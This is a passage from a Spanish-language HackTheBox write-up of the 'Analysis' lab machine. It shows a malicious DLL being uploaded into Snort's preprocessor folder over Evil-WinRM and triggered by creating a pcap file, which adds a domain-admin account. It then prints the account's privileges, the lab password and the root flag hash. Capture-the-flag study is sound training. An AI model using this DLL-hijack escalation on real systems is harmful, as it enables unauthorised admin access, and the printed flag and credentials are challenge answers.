Así que subimos nuestro dll malicioso
|
1 2 3 4 |
*Evil-WinRM* PS C:\snort\lib\snort_dynamicpreprocessor> upload tcapi.dll Info: Uploading /data/ctf/htb/machines/todo/analysis.htb/scripts/tcapi.dll to C:\snort\lib\snort_dynamicpreprocessor\tcapi.dll Data: 114672 bytes of 114672 bytes copied Info: Upload successful! |
Una vez hecho accedemos al directorio c:\private, el cual está siendo monitorizado, y creamos un fichero pcap vacío
|
1 |
*Evil-WinRM* PS C:\private> type nul > test.pcap |
Y automáticamente se habrá ejecutado nuestro código, y veremos el usuario privesc creado en el servidor
|
1 2 3 4 5 6 7 8 9 10 11 |
*Evil-WinRM* PS C:\private> net user User accounts for \\ ------------------------------------------------------------------------------- Administrateur amanson badam cwilliams Invit‚ jangel jdoe krbtgt lzen privesc soc_analyst svc_web technician webservice wsmith The command completed with one or more errors. |
Por lo que accedemos con el usuario privesc y verificamos los permisos
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 |
$ evil-winrm -i analysis.htb -u privesc -p 'password123!' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\privesc\Documents> whoami analysis\privesc *Evil-WinRM* PS C:\Users\privesc\Documents> whoami /all Informations sur l'utilisateur ------------------------ Nom d'utilisateur SID ================= ============================================= analysis\privesc S-1-5-21-916175351-3772503854-3498620144-3601 Informations de groupe ---------------------- Nom du groupe Type SID Attributs =================================================================== ================= ============================================ ============================================================================ Tout le monde Groupe bien connu S-1-1-0 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚ BUILTIN\Utilisateurs Alias S-1-5-32-545 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚ BUILTIN\AccŠs compatible pr‚-Windows 2000 Alias S-1-5-32-554 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚ BUILTIN\Administrateurs Alias S-1-5-32-544 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚, Propri‚taire du groupe AUTORITE NT\RESEAU Groupe bien connu S-1-5-2 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚ AUTORITE NT\Utilisateurs authentifi‚s Groupe bien connu S-1-5-11 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚ AUTORITE NT\Cette organisation Groupe bien connu S-1-5-15 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚ ANALYSIS\Admins du domaine Groupe S-1-5-21-916175351-3772503854-3498620144-512 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚ ANALYSIS\Groupe de r‚plication dont le mot de passe RODC est refus‚ Alias S-1-5-21-916175351-3772503854-3498620144-572 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚, Groupe local AUTORITE NT\Authentifications NTLM Groupe bien connu S-1-5-64-10 Groupe obligatoire, Activ‚ par d‚faut, Groupe activ‚ tiquette obligatoire\Niveau obligatoire ‚lev‚ Nom S-1-16-12288 Informations de privilŠges ---------------------- Nom de privilŠge Description tat ========================================= ========================================================================================== ====== SeAssignPrimaryTokenPrivilege Remplacer un jeton de niveau processus Activ‚ SeIncreaseQuotaPrivilege Ajuster les quotas de m‚moire pour un processus Activ‚ SeMachineAccountPrivilege Ajouter des stations de travail au domaine Activ‚ SeSecurityPrivilege G‚rer le journal d'audit et de s‚curit‚ Activ‚ SeTakeOwnershipPrivilege Prendre possession de fichiers ou d'autres objets Activ‚ SeLoadDriverPrivilege Charger et d‚charger les pilotes de p‚riph‚riques Activ‚ SeSystemProfilePrivilege Performance systŠme du profil Activ‚ SeSystemtimePrivilege Modifier l'heure systŠme Activ‚ SeProfileSingleProcessPrivilege Processus unique du profil Activ‚ SeIncreaseBasePriorityPrivilege Augmenter la priorit‚ de planification Activ‚ SeCreatePagefilePrivilege Cr‚er un fichier d'‚change Activ‚ SeBackupPrivilege Sauvegarder les fichiers et les r‚pertoires Activ‚ SeRestorePrivilege Restaurer les fichiers et les r‚pertoires Activ‚ SeShutdownPrivilege Arrˆter le systŠme Activ‚ SeDebugPrivilege D‚boguer les programmes Activ‚ SeSystemEnvironmentPrivilege Modifier les valeurs de l'environnement du microprogramme Activ‚ SeChangeNotifyPrivilege Contourner la v‚rification de parcours Activ‚ SeRemoteShutdownPrivilege Forcer l'arrˆt … partir d'un systŠme distant Activ‚ SeUndockPrivilege Retirer l'ordinateur de la station d'accueil Activ‚ SeEnableDelegationPrivilege Permettre … l'ordinateur et aux comptes d'utilisateurs d'ˆtre approuv‚s pour la d‚l‚gation Activ‚ SeManageVolumePrivilege Effectuer les tƒches de maintenance de volume Activ‚ SeImpersonatePrivilege Emprunter l'identit‚ d'un client aprŠs l'authentification Activ‚ SeCreateGlobalPrivilege Cr‚er des objets globaux Activ‚ SeIncreaseWorkingSetPrivilege Augmenter une plage de travail de processus Activ‚ SeTimeZonePrivilege Changer le fuseau horaire Activ‚ SeCreateSymbolicLinkPrivilege Cr‚er des liens symboliques Activ‚ SeDelegateSessionUserImpersonatePrivilege Obtenir un jeton d'emprunt d'identit‚ pour un autre utilisateur de la mˆme session Activ‚ INFORMATIONS SUR LES REVENDICATIONS DE L'UTILISATEUR ---------------------------------------------------- Revendications d'utilisateur inconnues. La prise en charge Kerberos pour le contr“le d'accŠs dynamique sur ce p‚riph‚rique a ‚t‚ d‚sactiv‚. *Evil-WinRM* PS C:\Users\privesc\Documents> |
Obteniendo la flag de root
Una vez que tenemos permisos de admin, vamos al escritorio del usuario administrateur y cogemos la flag
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
*Evil-WinRM* PS C:\Users\Administrateur\desktop> dir Directory: C:\Users\Administrateur\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 1/23/2024 5:26 PM 34 root.txt *Evil-WinRM* PS C:\Users\Administrateur\desktop> type root.txt e534328b0197c051ccc34fc4a6e1c59e *Evil-WinRM* PS C:\Users\Administrateur\desktop> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace










